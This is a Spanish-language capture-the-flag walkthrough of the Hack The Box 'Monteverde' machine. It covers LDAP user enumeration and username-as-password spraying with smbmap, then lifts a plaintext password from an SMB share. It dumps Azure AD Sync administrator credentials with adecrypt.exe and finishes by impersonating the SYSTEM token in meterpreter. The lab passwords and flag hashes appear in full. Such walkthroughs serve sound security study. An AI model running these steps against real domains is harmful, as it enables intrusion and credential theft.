
HTB{monteverde}

recon

nmap

# Nmap 7.80 scan initiated Thu Mar 19 18:04:54 2020 as: nmap -sC -sV -p- -v -o monteverde_tcp.nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.19s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-19 21:24:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49774/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/19%Time=5E73E09F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m51s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-03-19T21:27:24
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:19:09 2020 -- 1 IP address (1 host up) scanned in 855.05 seconds

Búsqueda básica en el ldap

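# Base search of the domain naming context with simple auth and no bind DN
# (an anonymous bind). The output is saved to ldap.log, which is what the
# grep/awk commands below read; the original line had no redirection.
ldapsearch -x -h 10.10.10.172 -b "DC=MEGABANK,DC=LOCAL" > ldap.log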

# Every line of the LDAP dump that mentions "user" (objectClass,
# userAccountControl, userPrincipalName, descriptions...). grep reads the
# file itself; the extra cat in the original added nothing.
grep user ldap.log
description: Default container for upgraded user accounts
objectClass: user
userAccountControl: 66082
description: Servers in this group enable users of RemoteApp programs and pers
 e users RemoteApp programs and personal virtual desktops run. This group need
 is applies only to WMI namespaces that grant access to the user.
objectClass: user
userAccountControl: 532480
description: All domain users
description: Servers in this group can access remote access properties of user
description: Members of this group can update user accounts in Active Director
objectClass: user
userAccountControl: 66048
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\mhope
userPrincipalName: mhope@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-ata@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-bexec@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-netapp@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\dgalanos
userPrincipalName: dgalanos@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\roleary
userPrincipalName: roleary@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\smorgan
userPrincipalName: smorgan@MEGABANK.LOCAL

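#######################################
# Build the account list (users.txt) from the ldapsearch dump.
# The original pipeline (grep user | grep home | awk -F users ...) keyed on
# the homeDirectory attribute, which in the dump above only mhope, dgalanos,
# roleary and smorgan carry; SABatchJobs and the svc-* accounts have only a
# userPrincipalName line, so the list printed below must have been completed
# by hand. userPrincipalName is present for every account, so it is used here.
# Arguments: $1 - ldapsearch output file (default: ldap.log)
#            $2 - destination list       (default: users.txt)
# Outputs:   one account name per line in $2, in dump order
# Returns:   1 (and leaves $2 untouched) when $1 cannot be read
#######################################
extract_users() {
  local src=${1:-ldap.log}
  local dst=${2:-users.txt}
  if [[ ! -r "$src" ]]; then
    printf 'extract_users: cannot read %s\n' "$src" >&2
    return 1
  fi
  # "user@MEGABANK.LOCAL" -> "user": drop everything from the @ onwards.
  awk -F': ' '/^userPrincipalName:/ { sub(/@.*/, "", $2); print $2 }' "$src" > "$dst"
}
extract_users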

dgalanos
mhope
roleary
SABatchJobs
SatchJobs
smorgan
svc-ata
svc-bexec
svc-netapp

user.txt

Utilizando estos mismos usuarios como contraseñas, obtenemos uno válido:

root@Kali:~/Documentos/hackthebox/machines/monteverde for k in `cat users.txt`; do smbmap -u $k -d MEGABANK.LOCAL -p $k  -H 10.10.10.172; done

SABatchJobs:SABatchJobs

root@Kali:~/Documentos/hackthebox/machines/monteverde smbclient -W MEGABANK.LOCAL '\\10.10.10.172\users$' -U 'SABatchJobs'%'SABatchJobs'                                                          
Try "help" to get a list of possible
smb: \> cd mhope                                                                                 
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 10:41:18 2020                       
  ..                                  D        0  Fri Jan  3 10:41:18 2020                                                                                                                         
  azure.xml                          AR     1212  Fri Jan  3 10:40:23 2020                                                                                                                         

                524031 blocks of size 4096. 519955 blocks available                                                                                                                                
smb: \mhope\> get azure.xml                                                                      
getting file \mhope\azure.xml of size 1212 as azure.xml (1,3 KiloBytes/sec) (average 1,3 KiloBytes/sec)

creds

root@Kali:~/Documentos/hackthebox/machines/monteverde/user.txt# cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
root@Kali:~/Documentos/hackthebox/machines/monteverde/user.txt#

Usamos el mismo script para ver de quién son las creds:

son de mhope.

winrm con mhope:4n0therD4y@n0th3r$

user.txt:4961976bd7d8f4eeb2ce3705e2f212f2

root.txt

PS C:\Users\mhope\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID                                         
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes                                        
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group

Con esto tendremos los privilegios necesarios para dumpear las creds del administrador, abusando del XML cifrado en las sentencias SQL de Azure AD Sync.

PS C:\program files\microsoft azure ad sync\bin> C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL
C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

PS C:\program files\microsoft azure ad sync\bin>

got it

root@Kali:~/Documentos/hackthebox/machines/monteverde/root.txt# ruby winrm_admin.rb
PS C:\Users\Administrator\Documents> whoami
megabank\administrator
PS C:\Users\Administrator\Documents> type C:\users\administrator\desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
PS C:\Users\Administrator\Documents>

Para System

meterpreter > load incognito
Loading extension incognito...Success.                                                                                         
meterpreter > list_tokens -u                                                                                                                                                                       
[-] Warning: Not currently running as SYSTEM, not all tokens will be available                                                                                                                     
             Call rev2self if primary process token is SYSTEM                                    

Delegation Tokens Available                      
========================================                                                                               
Font Driver Host\UMFD-0                          
Font Driver Host\UMFD-1                          
MEGABANK\AAD_987d7f2f57d2       
MEGABANK\Administrator      
MEGABANK\mhope                                   
NT AUTHORITY\LOCAL SERVICE                     
NT AUTHORITY\SYSTEM                                                       
NT SERVICE\SQLTELEMETRY                                                   
Window Manager\DWM-1                                                                      
Impersonation Tokens Available                                                              
========================================                                                         
NT AUTHORITY\NETWORK SERVICE                                                                     
NT SERVICE\MSSQLSERVER                                                                           
                                                                                                                                                                                                   
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"                                            

[+] Successfully impersonated user NT AUTHORITY\SYSTEM                                                                                                                                             
meterpreter >